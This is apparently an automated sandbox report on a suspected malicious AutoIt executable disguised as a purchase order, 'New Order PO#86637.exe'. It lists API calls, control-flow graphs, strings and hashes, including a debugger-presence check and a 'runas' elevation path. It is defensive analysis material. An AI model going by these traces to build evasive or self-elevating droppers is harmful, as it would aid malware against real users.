88498->88481 88499->88490 88500->88492 88501 44b5cb 58 API calls 88500->88501 88502 425b6f 88507 40dc90 88502->88507 88506 425b7e 88508 40bc70 52 API calls 88507->88508 88509 40dd03 88508->88509 88515 40f210 88509->88515 88511 40ddb7 88514 41130a 51 API calls __cinit 88511->88514 88512 40dd96 88512->88511 88518 40dc00 52 API calls 2 library calls 88512->88518 88514->88506 88519 40f250 RegOpenKeyExW 88515->88519 88517 40f230 88517->88512 88518->88512 88520 425e17 88519->88520 88521 40f275 RegQueryValueExW 88519->88521 88520->88517 88522 40f2c3 RegCloseKey 88521->88522 88523 40f298 88521->88523 88522->88517 88524 40f2a9 RegCloseKey 88523->88524 88525 425e1d 88523->88525 88524->88517

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New Order PO#86637.exe,00000104,?), ref: 00401F4C
                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\New Order PO#86637.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                            • String ID: C:\Users\user\Desktop\New Order PO#86637.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                            • API String ID: 2495805114-2897264345
                                                                            • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                            • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1020 427693-427696 1015->1020 1021 427688-427691 1015->1021 1019 4276b4-4276be 1016->1019 1022 427625-427629 1017->1022 1023 40e59c-40e59f 1017->1023 1031 40e5ec-40e60c 1018->1031 1032 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1032 1033 4276c6-4276ca GetSystemInfo 1019->1033 1020->1019 1030 427698-4276a8 1020->1030 1021->1019 1026 427636-427640 1022->1026 1027 42762b-427631 1022->1027 1028 40e5a5-40e5ae 1023->1028 1029 427654-427657 1023->1029 1026->1018 1027->1018 1035 40e5b4 1028->1035 1036 427645-42764f 1028->1036 1029->1018 1034 42765d-42766f 1029->1034 1037 4276b0 1030->1037 1038 4276aa-4276ae 1030->1038 1040 40e612-40e623 call 40efd0 1031->1040 1041 4276d5-4276df GetSystemInfo 1031->1041 1032->1031 1047 40e5e8 1032->1047 1033->1041 1034->1018 1035->1018 1036->1018 1037->1019 1038->1019 1040->1033 1046 40e629-40e63f call 40ef90 GetNativeSystemInfo 1040->1046 1050 40e641-40e642 FreeLibrary 1046->1050 1051 40e644-40e651 1046->1051 1047->1031 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                            • String ID: 0SH
                                                                            • API String ID: 3363477735-851180471
                                                                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                            • API String ID: 2574300362-3542929980
                                                                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                            • API String ID: 1762048999-758534266
                                                                            • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                            • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New Order PO#86637.exe,00000104,?), ref: 00401F4C
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New Order PO#86637.exe,00000104), ref: 00428B5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\New Order PO#86637.exe$CMDLINE$CMDLINERAW
                                                                            • API String ID: 3948761352-4144531230
                                                                            • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                            • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                            • String ID: D)E$D)E$FILE
                                                                            • API String ID: 3888824918-361185794
                                                                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                            • _wcscat.LIBCMT ref: 00427541
                                                                            • _wcslen.LIBCMT ref: 00427551
                                                                            • _wcslen.LIBCMT ref: 00427562
                                                                            • _wcscat.LIBCMT ref: 0042757C
                                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                            • String ID: Include$\
                                                                            • API String ID: 3173733714-3429789819
                                                                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _fseek.LIBCMT ref: 0045292B
                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                                            • _fseek.LIBCMT ref: 004529BF
                                                                            • _malloc.LIBCMT ref: 004529CA
                                                                            • _malloc.LIBCMT ref: 004529D6
                                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                                            • _free.LIBCMT ref: 00452A17
                                                                            • _free.LIBCMT ref: 00452A20
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1255752989-0
                                                                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                            • ImageList_ReplaceIcon.COMCTL32(00BFF530,000000FF,00000000), ref: 00410552
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BFF530,000000FF,00000000), ref: 00410552
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                            Strings
                                                                            Memory Dump Source
